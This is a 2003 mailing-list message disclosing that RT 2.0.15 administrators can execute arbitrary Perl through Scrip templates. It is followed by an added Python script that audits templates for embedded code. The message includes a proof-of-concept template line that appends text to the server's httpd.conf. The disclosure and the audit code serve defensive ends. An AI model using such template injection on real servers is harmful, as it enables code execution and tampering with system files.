[rt-devel] Security Problem in 2.0.15

Warnke, Andreas Andreas.Warnke at 3SOFT.de
Fri Feb 21 10:24:05 EST 2003


Hello,

Administrators of RT can do everything on the server the wwwrun user can
do:

Write a Scrip like:

Subject: AutoReply: {$Ticket->Subject}
Greetings,
This message has been automatically generated in response to the
creation of a trouble ticket regarding:
	"{$Ticket->Subject()}", 
a summary of which appears below.
Please don't reply to this message.  Your ticket has been
assigned an ID of [{$rtname} #{$Ticket->id()}].
-------------------------------------------------------------------------
{open DEBUG, ">>/etc/httpd/httpd.conf"; print DEBUG "#oh shit!"; close
DEBUG; $Transaction->Content()}

--
You can execute any Perl code on the server even if you have no access
to the server. This is a bit scary - from my point of view. I hope you
have set this straight with RT3?

Kind Regards
Andreas Warnke
--
Andreas Warnke
3SOFT GmbH, Frauenweiherst. 14, 91058 Erlangen
Tel.: +49-9131-7701-274 mailto:Andreas.Warnke at 3SOFT.de
Fax: +49-9131-7701-333 http://www.3SOFT.de
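
An added example, not part of the original message and not RT's own code: a Python audit that pulls every brace-delimited block out of a template like the one above and lists the blocks that do more than read a scalar or call an argument-less method. The function names, the allowlist pattern and the shortened sample template are assumptions made for this example.

```python
import re

# Constructed sample: the template from the message above, shortened.
SAMPLE_TEMPLATE = '''Subject: AutoReply: {$Ticket->Subject}
Your ticket has been assigned an ID of [{$rtname} #{$Ticket->id()}].
{open DEBUG, ">>/etc/httpd/httpd.conf"; print DEBUG "#oh shit!"; close
DEBUG; $Transaction->Content()}
'''

# Assumption: a block is "plain" when it is a single scalar, optionally
# followed by a chain of argument-less method calls ($rtname, $Ticket->id()).
PLAIN_BLOCK = re.compile(r'\s*\$\w+(?:->\w+(?:\(\s*\))?)*\s*;?\s*\Z')


def perl_blocks(template):
    """Yield (line_number, code) for each top-level {...} block.

    Nested braces are tracked by depth so a block containing its own
    braces is returned whole. Every brace is counted, escaped or not,
    which errs toward reporting too much rather than too little.
    """
    depth, start, start_line, line = 0, 0, 0, 1
    for i, ch in enumerate(template):
        if ch == '\n':
            line += 1
        elif ch == '{':
            if depth == 0:
                start, start_line = i + 1, line
            depth += 1
        elif ch == '}' and depth > 0:
            depth -= 1
            if depth == 0:
                yield start_line, template[start:i]
    if depth > 0:
        # Unterminated block: report what is there instead of hiding it.
        yield start_line, template[start:]


def audit(template):
    """Return (line, code) for blocks that are not plain value lookups."""
    return [(n, code.strip()) for n, code in perl_blocks(template)
            if not PLAIN_BLOCK.match(code)]


if __name__ == "__main__":
    for n, code in audit(SAMPLE_TEMPLATE):
        print(f"line {n}: review embedded Perl: {code!r}")
```

Run over exported template bodies, this gives a short review list of the templates whose embedded code goes beyond ticket field lookups.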



